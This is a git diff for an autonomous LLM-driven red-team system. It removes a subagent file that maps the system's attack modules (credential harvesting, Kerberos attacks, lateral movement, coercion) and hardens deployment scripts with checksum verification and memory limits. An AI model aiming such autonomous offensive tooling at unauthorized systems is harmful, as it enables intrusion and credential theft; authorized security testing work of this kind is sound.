diff --git a/.claude/agents/python-ares-expert.md b/.claude/agents/python-ares-expert.md
deleted file mode 100644
index 4663ce3e..00000000
--- a/.claude/agents/python-ares-expert.md
+++ /dev/null
@@ -1,131 +0,0 @@
----
-name: python-ares-expert
-description: Expert on the Python ares codebase at ../ares (src/ares/). Use when you need to understand Python ares architecture, look up how something works in Python, find equivalent implementations, or answer questions about the original Python system before porting to Rust.
-tools: Read, Glob, Grep, Bash
-model: sonnet
----
-
-You are an expert on the **Python ares codebase** located at `/Users/l/dreadnode/ares`. Your job is to answer questions about the Python implementation accurately by reading the actual source code.
-
-## Project Overview
-
-Ares is an autonomous security operations multi-agent system with:
-
-- **Red Team**: LLM-powered penetration testing with coordinator/worker architecture
-- **Blue Team**: SOC alert investigation and threat hunting
-
-Built on the Dreadnode Agent SDK, rigging (LLM framework), and MITRE ATT&CK.
-
-## Codebase Layout
-
-```
-/Users/l/dreadnode/ares/
- src/ares/
- core/ # Core framework
- dispatcher/ # Task dispatcher (routing, throttling, result processing, publishing)
- worker/ # Worker agent (_worker.py, operations.py, prompts.py, dc_resolution.py)
- orchestrator/ # Orchestrator (_orchestrator.py)
- factories/ # Agent factories (red_agents.py, blue_factory.py)
- replay/ # Deterministic replay
- persistent_store/ # Persistent storage
- blue_dispatcher/ # Blue team dispatcher
- blue_worker/ # Blue team worker
- models.py # ALL data models (Credential, Host, Hash, Target, SharedRedTeamState, etc.)
- config.py # Configuration loading
- state_backend.py # Redis state backend (red team)
- blue_state_backend.py # Redis state backend (blue team)
- task_queue.py # Redis task queue (red team)
- blue_task_queue.py # Redis task queue (blue team)
- redis_client.py # Redis client wrapper
- recovery.py # Checkpoint/recovery
- persistence.py # State serialization
- workflows.py # Credential expansion workflows
- engines.py # Question generation engines
- correlation.py # Red-Blue correlation
- evidence_validation.py # Evidence dedup/validation
- k8s_executor.py # Kubernetes pod execution
- lateral_analyzer.py # Graph-based lateral movement
- messages.py # Inter-agent messages
- orchestrator_client.py # Client for orchestrator communication
- orchestrator_service.py # Orchestrator service pod
- query_resilience.py # Query retry logic
- remote.py # Remote K8s execution
- templates.py # Jinja2 template loading
- tracing.py # OpenTelemetry tracing
- capability_registry.py # Agent capability registration
- context_manager.py # LLM context window management
- tool_retrieval.py # Dynamic tool loading
- circuit_breaker.py # Circuit breaker pattern
- tools/
- red/ # Red team tools
- credential_discovery/ # discovery.py, harvesting.py, cracking.py, pilfering.py
- reconnaissance.py # nmap, enum4linux, user/share enumeration
- orchestrator.py # Dispatch functions
- kerberos_attacks.py # Delegation, tickets, ADCS
- lateral_movement.py # psexec, wmi, smb, evil-winrm
- acl_attacks.py # bloodyAD, pywhisker, dacledit
- privilege_escalation.py
- coercion.py # PetitPotam, Coercer, relay
- cve_exploits.py
- reporting.py
- common.py
- blue/ # Blue team tools
- investigation.py, grafana.py, query_templates.py, observability.py, actions.py, learning.py
- shared/
- mitre.py # MITRE ATT&CK integration
- agents/
- red/ # Red team agents (dynamic via factories)
- blue/
- soc_investigator.py # SOC investigation orchestrator
- integrations/ # Third-party integrations
- reports/ # Report generation (investigation.py, redteam.py, blueteam.py)
- eval/ # Evaluation framework
- templates/ # Jinja2 prompt templates
- redteam/agents/ # Per-role agent prompts (orchestrator.md.jinja, recon.md.jinja, etc.)
- main.py # CLI entry point
- cli_ops.py # CLI operations (loot, status, inject, etc.)
- cli_blue_ops.py # Blue team CLI operations
- cli_history.py # CLI history
- tests/ # Test suite
- docs/
- codemap.md # Full codebase map
- red.md # Red team architecture (AUTHORITATIVE)
- blue.md # Blue team workflow
- config/
- multi-agent-production.yaml # Agent configurations
-```
-
-## Multi-Agent Architecture
-
-- **Orchestrator**: Central LLM coordinator, dispatches tasks, never executes tools directly
-- **Workers**: RECON, CREDENTIAL_ACCESS, CRACKER, ACL, PRIVESC, LATERAL, COERCION
-- **Communication**: Redis pub/sub + task queues
-- **State**: Write-through cache (memory + Redis persistence)
-- **Namespace**: `attack-simulation` in Kubernetes
-
-## Key Design Patterns
-
-1. **Write-through cache**: `SharedRedTeamState` in memory, persisted to Redis via `state_backend.py`
-2. **Task queue**: Redis-based with priority routing in `task_queue.py`
-3. **Result processing**: `dispatcher/result_processing.py` extracts credentials/hashes from tool output
-4. **Publishing**: `dispatcher/publishing.py` broadcasts discovered credentials to all agents
-5. **Recovery**: `recovery.py` can restore operation state from Redis checkpoints
-6. **Factory pattern**: `factories/red_agents.py` maps AgentRole -> toolsets (ROLE_TOOLSETS)
-
-## How to Answer Questions
-
-1. **Always read the actual source files** before answering - don't guess from the layout alone
-2. Start with the most relevant file based on the question
-3. For architecture questions, read `docs/red.md` and `docs/codemap.md`
-4. For model/data questions, read `src/ares/core/models.py`
-5. For tool implementations, read the specific file in `src/ares/tools/red/`
-6. For orchestration logic, read `src/ares/core/dispatcher/` and `src/ares/core/orchestrator/`
-7. Be precise: include file paths, function names, and line numbers
-8. When asked "how does X work", trace the full code path
-
-## Important Context
-
-- This codebase is being ported to Rust (the parent project at `/Users/l/dreadnode/ares-rust-cli/ares-rust/`)
-- Questions will often be about understanding the Python implementation to inform the Rust port
-- The Python codebase uses: rigging (LLM), loguru (logging), redis, kubernetes, cyclopts (CLI), pydantic (models)
-- Domain conventions: `contoso.local` (primary), `fabrikam.local` (secondary), `192.168.58.x` subnet
diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml
index bbe3514b..7528b8c1 100644
--- a/.taskfiles/ec2/Taskfile.yaml
+++ b/.taskfiles/ec2/Taskfile.yaml
@@ -161,21 +161,32 @@ tasks:
"aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares-src.tar.gz /tmp/ares-src.tar.gz",
"tar -xzf /tmp/ares-src.tar.gz -C " + $build_dir,
"cd " + $build_dir + " && cargo build --profile dev-deploy -p ares-cli 2>&1",
- "cp " + $build_dir + "/target/dev-deploy/ares /usr/local/bin/ares && chmod +x /usr/local/bin/ares",
+ "SRC=" + $build_dir + "/target/dev-deploy/ares",
+ "if [ ! -f \"$SRC\" ]; then echo ERROR: build artifact missing at $SRC; exit 1; fi",
+ "BUILD_RAW=$(sha256sum \"$SRC\"); BUILD_SHA=${BUILD_RAW%% *}",
+ "echo Build SHA: $BUILD_SHA",
+ "install -m 755 \"$SRC\" /usr/local/bin/ares",
+ "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}",
+ "echo Deploy SHA: $DEPLOY_SHA",
+ "if [ \"$BUILD_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from build artifact build=$BUILD_SHA deploy=$DEPLOY_SHA; exit 1; fi",
"echo Deployed: && ls -lh /usr/local/bin/ares"
]}' > "$PARAMS_FILE"
+ # Clean cargo builds on a t3.medium can run 15-25 min — pre-EC2-reboot
+ # cache may be wiped, and incremental builds still need to relink.
+ # Allow 30 min total for both the SSM command itself and the local
+ # polling loop so we don't bail mid-build with a "InProgress" report.
CMD_ID=$(aws ssm send-command \
--profile "{{.EC2_PROFILE}}" \
--region "{{.EC2_REGION}}" \
--instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" \
--parameters "file://$PARAMS_FILE" \
- --timeout-seconds 600 \
+ --timeout-seconds 1800 \
--query "Command.CommandId" --output text)
- # Poll for completion (up to 10 minutes)
- for i in $(seq 1 300); do
+ # Poll for completion (up to 30 minutes)
+ for i in $(seq 1 900); do
STATUS=$(aws ssm get-command-invocation \
--profile "{{.EC2_PROFILE}}" \
--region "{{.EC2_REGION}}" \
@@ -291,11 +302,25 @@ tasks:
fi
ls -lh "$BIN_PATH"
+ # Pin sha256 of what we're about to ship so the SSM deploy step can
+ # verify the binary that lands on /usr/local/bin/ares matches exactly.
+ # Without this, the cp can silently fail to overwrite (ETXTBSY, immutable
+ # attribute, symlink redirection, prior deploy race) and the task still
+ # reports success.
+ if command -v sha256sum >/dev/null 2>&1; then
+ BUILD_SHA=$(sha256sum "$BIN_PATH" | awk '{print $1}')
+ else
+ BUILD_SHA=$(shasum -a 256 "$BIN_PATH" | awk '{print $1}')
+ fi
+ echo -e "{{.INFO}} Build SHA: $BUILD_SHA"
+ mkdir -p target/.deploy
+ echo "$BUILD_SHA" > target/.deploy/ares.sha256
+
echo -e "{{.INFO}} Uploading binary to s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/..."
aws s3 cp "$BIN_PATH" "s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/ares" \
--profile "{{.EC2_PROFILE}}" --region "{{.EC2_REGION}}"
- echo -e "{{.SUCCESS}} Binary staged in S3"
+ echo -e "{{.SUCCESS}} Binary staged in S3 (sha=$BUILD_SHA)"
# Pull from S3 on EC2 via SSM + verify (skip for remote builds)
- |
@@ -316,11 +341,30 @@ tasks:
echo -e "{{.INFO}} Pulling binaries from S3 to $INSTANCE_ID..."
+ EXPECTED_SHA=""
+ if [ -f target/.deploy/ares.sha256 ]; then
+ EXPECTED_SHA=$(cat target/.deploy/ares.sha256)
+ fi
+
PARAMS_FILE=$(mktemp)
trap "rm -f $PARAMS_FILE" EXIT
- jq -n --arg bucket "{{.BCP_BUCKET}}" --arg prefix "{{.S3_DEPLOY_PREFIX}}" \
- '{"commands": ["set -e; aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /usr/local/bin/ares; chmod +x /usr/local/bin/ares; echo Deployed:; ls -lh /usr/local/bin/ares"]}' \
- > "$PARAMS_FILE"
+ jq -n \
+ --arg bucket "{{.BCP_BUCKET}}" \
+ --arg prefix "{{.S3_DEPLOY_PREFIX}}" \
+ --arg expected_sha "$EXPECTED_SHA" \
+ '{"commands": [
+ "set -ex",
+ "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /tmp/ares.staged",
+ "STAGED_RAW=$(sha256sum /tmp/ares.staged); STAGED_SHA=${STAGED_RAW%% *}",
+ "echo Staged SHA: $STAGED_SHA",
+ "if [ -n \"" + $expected_sha + "\" ] && [ \"$STAGED_SHA\" != \"" + $expected_sha + "\" ]; then echo ERROR: S3 staged binary sha mismatch expected=" + $expected_sha + " staged=$STAGED_SHA; exit 1; fi",
+ "install -m 755 /tmp/ares.staged /usr/local/bin/ares",
+ "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}",
+ "echo Deploy SHA: $DEPLOY_SHA",
+ "if [ \"$STAGED_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from staged staged=$STAGED_SHA deploy=$DEPLOY_SHA; exit 1; fi",
+ "rm -f /tmp/ares.staged",
+ "echo Deployed: && ls -lh /usr/local/bin/ares"
+ ]}' > "$PARAMS_FILE"
CMD_ID=$(aws ssm send-command \
--profile "{{.EC2_PROFILE}}" \
@@ -966,6 +1010,7 @@ tasks:
SECRETS_ID: '{{.SECRETS_ID | default "ares/api-keys"}}'
LLM_MODEL: '{{.LLM_MODEL | default ""}}'
FLUSH_REDIS: '{{.FLUSH_REDIS | default "true"}}'
+ OPERATION_ID: '{{.OPERATION_ID | default ""}}'
cmds:
- |
INSTANCE_ID=$(aws ec2 describe-instances \
@@ -981,7 +1026,11 @@ tasks:
exit 1
fi
- OP_ID="op-$(date -u +%Y%m%d-%H%M%S)"
+ if [ -n "{{.OPERATION_ID}}" ]; then
+ OP_ID="{{.OPERATION_ID}}"
+ else
+ OP_ID="op-$(date -u +%Y%m%d-%H%M%S)"
+ fi
echo -e "{{.INFO}} Operation ID: $OP_ID"
# Build target IPs JSON array
@@ -1018,6 +1067,10 @@ tasks:
ANTHROPIC_KEY=$(echo "$SECRETS" | jq -r .ANTHROPIC_API_KEY)
GRAFANA_URL_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_URL // empty')
GRAFANA_TOKEN_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_SERVICE_ACCOUNT_TOKEN // empty')
+ LOKI_URL_VAL=$(echo "$SECRETS" | jq -r '.LOKI_URL // empty')
+ if [ -z "$LOKI_URL_VAL" ]; then
+ LOKI_URL_VAL="{{.LOKI_URL}}"
+ fi
DREADNODE_API_KEY=$(echo "$SECRETS" | jq -r '.DREADNODE_API_KEY // empty')
OTEL_TRACES_ENDPOINT="{{.OTEL_TRACES_ENDPOINT}}"
@@ -1035,6 +1088,9 @@ tasks:
ENV_FILE_CMD="$ENV_FILE_CMD; echo 'GRAFANA_SERVICE_ACCOUNT_TOKEN=${GRAFANA_TOKEN_VAL}' >> /etc/ares/env"
fi
fi
+ if [ -n "$LOKI_URL_VAL" ]; then
+ ENV_FILE_CMD="$ENV_FILE_CMD; echo 'LOKI_URL=${LOKI_URL_VAL}' >> /etc/ares/env"
+ fi
ENV_FILE_CMD="$ENV_FILE_CMD; echo 'ARES_DEPLOYMENT={{.EC2_DEPLOYMENT}}' >> /etc/ares/env"
# OTEL: send traces to Alloy OTLP gateway → Tempo via HTTP/protobuf
ENV_FILE_CMD="$ENV_FILE_CMD; echo 'OTEL_EXPORTER_OTLP_TRACES_ENDPOINT=${OTEL_TRACES_ENDPOINT}' >> /etc/ares/env"
@@ -1053,6 +1109,7 @@ tasks:
export ANTHROPIC_API_KEY='${ANTHROPIC_KEY}'
export GRAFANA_URL='${GRAFANA_URL_VAL}'
export GRAFANA_SERVICE_ACCOUNT_TOKEN='${GRAFANA_TOKEN_VAL}'
+ export LOKI_URL='${LOKI_URL_VAL}'
export ARES_REDIS_URL=redis://127.0.0.1:6379
{{- if .LLM_MODEL}}
export ARES_LLM_MODEL='{{.LLM_MODEL}}'
diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl
index 619a4bc2..0e1ff0dc 100755
--- a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl
+++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl
@@ -1,6 +1,11 @@
#!/bin/bash
-# Launch ares orchestrator with environment variables
-# Placeholders are substituted by the calling task via envsubst/sed
+# Launch ares orchestrator in its own systemd transient unit so it (and any
+# tool subprocesses it spawns) gets its own cgroup, separate from
+# amazon-ssm-agent.service. Otherwise everything launched by SSM
+# RunShellScript inherits SSM's cgroup and competes with it for memory —
+# resulting in CONSTRAINT_MEMCG OOM-kills regardless of OOMScoreAdjust.
+set -euo pipefail
+
export ARES_REDIS_URL=redis://127.0.0.1:6379
export RUST_LOG=info
export ARES_OPERATION_ID='__ARES_PAYLOAD__'
@@ -13,6 +18,7 @@ export DREADNODE_WORKSPACE='__DREADNODE_WORKSPACE__'
export DREADNODE_PROJECT='__DREADNODE_PROJECT__'
export GRAFANA_SERVICE_ACCOUNT_TOKEN='__GRAFANA_TOKEN__'
export GRAFANA_URL='__GRAFANA_URL__'
+export LOKI_URL='__LOKI_URL__'
_llm_model='__ARES_LLM_MODEL__'
if [ -n "$_llm_model" ] && [ "$_llm_model" = "${_llm_model#__}" ]; then
export ARES_LLM_MODEL="$_llm_model"
@@ -25,13 +31,57 @@ if [ -n "$_blue_model" ] && [ "$_blue_model" = "${_blue_model#__}" ]; then
fi
export ARES_DEPLOYMENT='__ARES_DEPLOYMENT__'
export ARES_CONFIG=/etc/ares/config.yaml
+export ARES_MAX_CONCURRENT_TASKS=8
_otel_endpoint='__OTEL_TRACES_ENDPOINT__'
if [ -n "$_otel_endpoint" ] && [ "$_otel_endpoint" = "${_otel_endpoint#__}" ]; then
export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT="$_otel_endpoint"
export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf'
export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red'
fi
+
+mkdir -p /var/log/ares
+
+# Stop any prior orchestrator (transient unit or stray nohup process).
+systemctl stop ares-orchestrator.service 2>/dev/null || true
+systemctl reset-failed ares-orchestrator.service 2>/dev/null || true
pkill -f 'ares orchestrator' 2>/dev/null || true
sleep 1
-nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 &
-echo "Orchestrator started (PID: $!)"
+
+# Spawn as a transient systemd service in system-ares.slice. --setenv=NAME
+# (no value) inherits from current environment, preserving quoting that
+# would otherwise be mangled by EnvironmentFile parsing of JSON payloads.
+exec systemd-run \
+ --unit=ares-orchestrator.service \
+ --slice=system-ares.slice \
+ --description="Ares Orchestrator (transient)" \
+ --collect \
+ --setenv=ARES_REDIS_URL \
+ --setenv=RUST_LOG \
+ --setenv=ARES_OPERATION_ID \
+ --setenv=OPENAI_API_KEY \
+ --setenv=ANTHROPIC_API_KEY \
+ --setenv=DREADNODE_API_KEY \
+ --setenv=DREADNODE_SERVER_URL \
+ --setenv=DREADNODE_ORGANIZATION \
+ --setenv=DREADNODE_WORKSPACE \
+ --setenv=DREADNODE_PROJECT \
+ --setenv=GRAFANA_SERVICE_ACCOUNT_TOKEN \
+ --setenv=GRAFANA_URL \
+ --setenv=LOKI_URL \
+ --setenv=ARES_LLM_MODEL \
+ --setenv=ARES_TOOL_DISPATCH \
+ --setenv=ARES_BLUE_ENABLED \
+ --setenv=ARES_BLUE_LLM_MODEL \
+ --setenv=ARES_DEPLOYMENT \
+ --setenv=ARES_CONFIG \
+ --setenv=ARES_MAX_CONCURRENT_TASKS \
+ --setenv=OTEL_EXPORTER_OTLP_TRACES_ENDPOINT \
+ --setenv=OTEL_EXPORTER_OTLP_PROTOCOL \
+ --setenv=OTEL_RESOURCE_ATTRIBUTES \
+ --property=StandardOutput=append:/var/log/ares/orchestrator.log \
+ --property=StandardError=append:/var/log/ares/orchestrator.log \
+ --property=OOMScoreAdjust=-500 \
+ --property=TasksMax=4096 \
+ --property=MemoryHigh=8G \
+ --property=MemoryMax=10G \
+ /usr/local/bin/ares orchestrator
diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh
index f073ecfd..858fcfd8 100755
--- a/.taskfiles/ec2/scripts/setup.sh
+++ b/.taskfiles/ec2/scripts/setup.sh
@@ -21,6 +21,46 @@ fi
echo "=== Creating directories ==="
mkdir -p /var/log/ares /etc/ares
+echo "=== Removing legacy ares-worker@ unit (renamed in PR #226) ==="
+if [ -f /etc/systemd/system/ares-worker@.service ]; then
+ for role in recon credential_access cracker acl privesc lateral coercion; do
+ systemctl disable --now "ares-worker@${role}.service" 2>/dev/null || true
+ done
+ rm -f /etc/systemd/system/ares-worker@.service
+fi
+
+echo "=== Creating system-ares.slice with global memory cap ==="
+cat >/etc/systemd/system/system-ares.slice <<'SLICE_EOF'
+[Unit]
+Description=Ares system slice (orchestrator + workers)
+Before=slices.target
+
+[Slice]
+MemoryMax=12G
+MemoryHigh=10G
+TasksMax=8192
+SLICE_EOF
+
+echo "=== Ensuring 4G swap file (OOM cushion) ==="
+if [ ! -f /swapfile ] || [ "$(stat -c%s /swapfile 2>/dev/null || echo 0)" -lt 4000000000 ]; then
+ swapoff /swapfile 2>/dev/null || true
+ rm -f /swapfile
+ fallocate -l 4G /swapfile || dd if=/dev/zero of=/swapfile bs=1M count=4096
+ chmod 600 /swapfile
+ mkswap /swapfile
+ swapon /swapfile
+ if ! grep -q '^/swapfile' /etc/fstab; then
+ echo '/swapfile none swap sw 0 0' >>/etc/fstab
+ fi
+fi
+
+echo "=== Tuning OOM behavior (oom_kill_allocating_task, swappiness) ==="
+cat >/etc/sysctl.d/90-ares.conf <<'SYSCTL_EOF'
+vm.oom_kill_allocating_task = 1
+vm.swappiness = 10
+SYSCTL_EOF
+sysctl -p /etc/sysctl.d/90-ares.conf >/dev/null
+
echo "=== Creating systemd worker template unit ==="
cat >/etc/systemd/system/ares@.service <<'UNIT_EOF'
[Unit]
@@ -42,9 +82,19 @@ RestartSec=5
StandardOutput=append:/var/log/ares/%i.log
StandardError=append:/var/log/ares/%i.log
+# Contain child processes (netexec, hashcat, nmap, etc.) within this cgroup.
+# Without these limits, runaway tool processes can OOM the entire system and
+# take down the SSM agent (see: Apr 2026 incident).
+Delegate=yes
+Slice=system-ares.slice
+MemoryHigh=1500M
+MemoryMax=2G
+TasksMax=256
+
[Install]
WantedBy=multi-user.target
UNIT_EOF
+systemctl daemon-reload
echo "=== Installing cracking tools ==="
if ! command -v hashcat >/dev/null 2>&1 || ! command -v john >/dev/null 2>&1; then
diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml
index 73b2119a..b93cb879 100644
--- a/.taskfiles/red/Taskfile.yaml
+++ b/.taskfiles/red/Taskfile.yaml
@@ -19,12 +19,13 @@ tasks:
# ===========================================================================
multi:
- desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging])"
+ desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging] [IPS=10.1.10.10,10.1.10.11])"
silent: true
vars:
OPERATION_ID: '{{.OPERATION_ID | default ""}}'
RESUME: '{{.RESUME | default "false"}}'
TARGET_ENV: '{{.TARGET_ENV | default "staging"}}'
+ IPS: '{{.IPS | default ""}}'
OPERATION_ID_COMPUTED:
sh: |
if [ -n "{{.OPERATION_ID}}" ]; then
@@ -71,6 +72,14 @@ tasks:
MODEL_OVERRIDE_ENV="ARES_MODEL_OVERRIDE={{.MODEL}}"
fi
+ # When IPS is supplied, target IPs directly and skip EC2 Name-tag resolution
+ # (the orchestrator pod has no `aws` CLI). Otherwise default to AWS lookup.
+ if [ -n "{{.IPS}}" ]; then
+ TARGET_FLAGS="--ips {{.IPS}}"
+ else
+ TARGET_FLAGS="--resolve-targets --aws-profile {{.TARGET_PROFILE}} --aws-region {{.TARGET_REGION}}"
+ fi
+
# CLI auto-loads .env if present, or use --secrets-from 1password
kubectl exec -i -n {{.K8S_NAMESPACE}} deploy/ares-orchestrator -- \
env $MODEL_OVERRIDE_ENV \
@@ -82,9 +91,7 @@ tasks:
GRAFANA_URL="{{.GRAFANA_URL}}" \
ares --redis-url "{{.REDIS_URL}}" ops submit \
"{{.TARGET}}" "{{.DOMAIN}}" \
- --resolve-targets \
- --aws-profile "{{.TARGET_PROFILE}}" \
- --aws-region "{{.TARGET_REGION}}" \
+ $TARGET_FLAGS \
--pin-active \
--operation-id "{{.OPERATION_ID_COMPUTED}}" \
--model "{{.MODEL}}" \
@@ -738,6 +745,7 @@ tasks:
BLUE_ENABLED: '{{.BLUE_ENABLED | default "0"}}'
BLUE_LLM_MODEL: '{{.BLUE_LLM_MODEL | default ""}}'
EC2_DEPLOYMENT: '{{.EC2_DEPLOYMENT | default "alpha-operator-range"}}'
+ STRATEGY: '{{.STRATEGY | default "comprehensive"}}'
RESOLVED_TARGETS:
sh: |
TARGET="{{.TARGET}}"
@@ -867,7 +875,7 @@ tasks:
# Build JSON payload for ARES_OPERATION_ID
TARGET_IPS_JSON=$(echo "{{.RESOLVED_TARGETS}}" | tr ',' '\n' | sed 's/^/"/;s/$/"/' | paste -sd, - | sed 's/^/[/;s/$/]/')
- ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\"}"
+ ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\",\"strategy\":\"{{.STRATEGY}}\"}"
# Build orchestrator launch script from template
ORCH_SCRIPT=$(mktemp)
@@ -882,6 +890,7 @@ tasks:
-e "s|__DREADNODE_PROJECT__|{{.DREADNODE_PROJECT}}|" \
-e "s|__GRAFANA_TOKEN__|${GRAFANA_SERVICE_ACCOUNT_TOKEN:-}|" \
-e "s|__GRAFANA_URL__|{{.GRAFANA_URL}}|" \
+ -e "s|__LOKI_URL__|{{.LOKI_URL}}|" \
-e "s|__ARES_LLM_MODEL__|{{.MODEL}}|" \
-e "s|__ARES_BLUE_ENABLED__|{{.BLUE_ENABLED}}|" \
-e "s|__ARES_BLUE_LLM_MODEL__|{{.BLUE_LLM_MODEL}}|" \
diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.json b/.taskfiles/remote/orchestrator-wrapper-patch.json
index 9ee1be92..67009f79 100644
--- a/.taskfiles/remote/orchestrator-wrapper-patch.json
+++ b/.taskfiles/remote/orchestrator-wrapper-patch.json
@@ -8,7 +8,7 @@
"op": "replace",
"path": "/spec/template/spec/containers/0/args",
"value": [
- "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: ${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone"
+ "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n case \"$OP_REQUEST\" in *\"\\\"operation_id\\\"\"*) ;; *) OP_REQUEST=\"\" ;; esac\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n if [ -z \"$OP_ID\" ]; then\n echo \"Skipping malformed op request\" >&2\n continue\n fi\n echo \"Starting operation: $OP_ID\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation $OP_ID exited with status $status\" >&2\n fi\ndone"
]
}
]
diff --git a/Cargo.lock b/Cargo.lock
index c3ce37e8..82d86d55 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -118,6 +118,7 @@ dependencies = [
"chrono",
"clap",
"dotenvy",
+ "hickory-resolver",
"redis",
"regex",
"rstest",
@@ -189,6 +190,7 @@ dependencies = [
"anyhow",
"approx",
"ares-core",
+ "base64",
"chrono",
"redis",
"regex",
@@ -602,6 +604,12 @@ dependencies = [
"hybrid-array",
]
+[[package]]
+name = "data-encoding"
+version = "2.11.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a4ae5f15dda3c708c0ade84bfee31ccab44a3da4f88015ed22f63732abe300c8"
+
[[package]]
name = "der"
version = "0.7.10"
@@ -674,6 +682,18 @@ dependencies = [
"serde",
]
+[[package]]
+name = "enum-as-inner"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc"
+dependencies = [
+ "heck",
+ "proc-macro2",
+ "quote",
+ "syn",
+]
+
[[package]]
name = "equivalent"
version = "1.0.2"
@@ -998,6 +1018,51 @@ version = "0.4.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70"
+[[package]]
+name = "hickory-proto"
+version = "0.24.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "92652067c9ce6f66ce53cc38d1169daa36e6e7eb7dd3b63b5103bd9d97117248"
+dependencies = [
+ "async-trait",
+ "cfg-if",
+ "data-encoding",
+ "enum-as-inner",
+ "futures-channel",
+ "futures-io",
+ "futures-util",
+ "idna",
+ "ipnet",
+ "once_cell",
+ "rand 0.8.6",
+ "thiserror 1.0.69",
+ "tinyvec",
+ "tokio",
+ "tracing",
+ "url",
+]
+
+[[package]]
+name = "hickory-resolver"
+version = "0.24.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cbb117a1ca520e111743ab2f6688eddee69db4e0ea242545a604dce8a66fd22e"
+dependencies = [
+ "cfg-if",
+ "futures-util",
+ "hickory-proto",
+ "ipconfig",
+ "lru-cache",
+ "once_cell",
+ "parking_lot",
+ "rand 0.8.6",
+ "resolv-conf",
+ "smallvec",
+ "thiserror 1.0.69",
+ "tokio",
+ "tracing",
+]
+
[[package]]
name = "hkdf"
version = "0.12.4"
@@ -1316,6 +1381,19 @@ dependencies = [
"serde_core",
]
+[[package]]
+name = "ipconfig"
+version = "0.3.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4d40460c0ce33d6ce4b0630ad68ff63d6661961c48b6dba35e5a4d81cfb48222"
+dependencies = [
+ "socket2",
+ "widestring",
+ "windows-registry",
+ "windows-result",
+ "windows-sys 0.61.2",
+]
+
[[package]]
name = "ipnet"
version = "2.12.0"
@@ -1468,6 +1546,12 @@ dependencies = [
"vcpkg",
]
+[[package]]
+name = "linked-hash-map"
+version = "0.5.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0717cef1bc8b636c6e1c1bbdefc09e6322da8a9321966e8928ef80d20f7f770f"
+
[[package]]
name = "linux-raw-sys"
version = "0.12.1"
@@ -1495,6 +1579,15 @@ version = "0.4.29"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897"
+[[package]]
+name = "lru-cache"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "31e24f1ad8321ca0e8a1e0ac13f23cb668e6f5466c2c57319f6a5cf1cc8e3b1c"
